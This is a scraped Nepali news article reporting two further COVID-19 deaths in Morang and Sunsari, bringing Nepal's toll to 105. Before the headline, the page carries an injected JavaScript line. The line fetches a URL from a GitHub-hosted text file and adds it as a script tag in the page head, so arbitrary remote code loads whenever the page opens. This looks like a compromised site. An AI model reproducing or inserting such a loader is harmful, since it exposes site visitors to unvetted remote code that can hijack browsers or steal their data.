;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); नेपालमा कोरोनाका कारण थप २ जनाको मृत्यु : १०५ पुग्यो मृतकको संख्या – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • नेपालमा कोरोनाका कारण थप २ जनाको मृत्यु : १०५ पुग्यो मृतकको संख्या
जुनेली बिशेष

नेपालमा कोरोनाका कारण थप २ जनाको मृत्यु : १०५ पुग्यो मृतकको संख्या

कोरोनाले मृत्यु

साउन ३२,

सुनसरी/मोरङ । मोरङमा थप २ जनाको कोरोना संक्रमणका कारण मृत्यु भएको छ । मृत्यु हुनेमा विराटनगर महानगरपलिका ३ घर भएकी ५७ बर्षिया र मोरङ तिनपैनी ५० बर्षिया महिला रहेकी छन् । ५७ वर्षीया ती महिलाको गएराति विराटनगर स्थित माडवाडी शेवा सदनको आईसुलेसनमा मृत्यु भएको हो ।

विहीबार गरिएको पिसिआर परीक्षणमा महिलामा कोरोना संक्रण पुष्टि भएको थियो । महिलालाई केही समयदेखि सुगर प्रेसर र दम रहेको प्रदेश १ सामाजिक विकस मन्त्रालयले जनाएको छ । अर्की ५० बर्षीया महिलाको सुनसरी स्थित बिपि कोइराला स्वास्थ विज्ञान प्रतिष्ठानमा आइतबार मृत्यु भएको हो ।

विराटनगरको न्यूरो हस्पिटलबाट रिफर भएर प्रतिष्ठान आएकी उनको उपचारका क्रममा निधन भएको वीपी प्रतिष्ठानका प्रबक्ता डा निदेश सापकोटाले जानकारी दिए ।  उनमा चार/पाँच दिनदेखि अत्याधिक ज्वरो र खोकी लाग्नुका साथै श्वासप्रश्वासमा समेत गम्भीर समस्या भएको थियो ।

मृतक विगत लामो समयदेखि मुटु र फोक्सोको रोगी भएको बताइएको छ । यो संगै नेपालमा कोरोनाका कारण मृत्यु हुनेको संख्या १ सय ५ पुगेको छ ।file Photo

फेसबुक प्रतिक्रियाहरु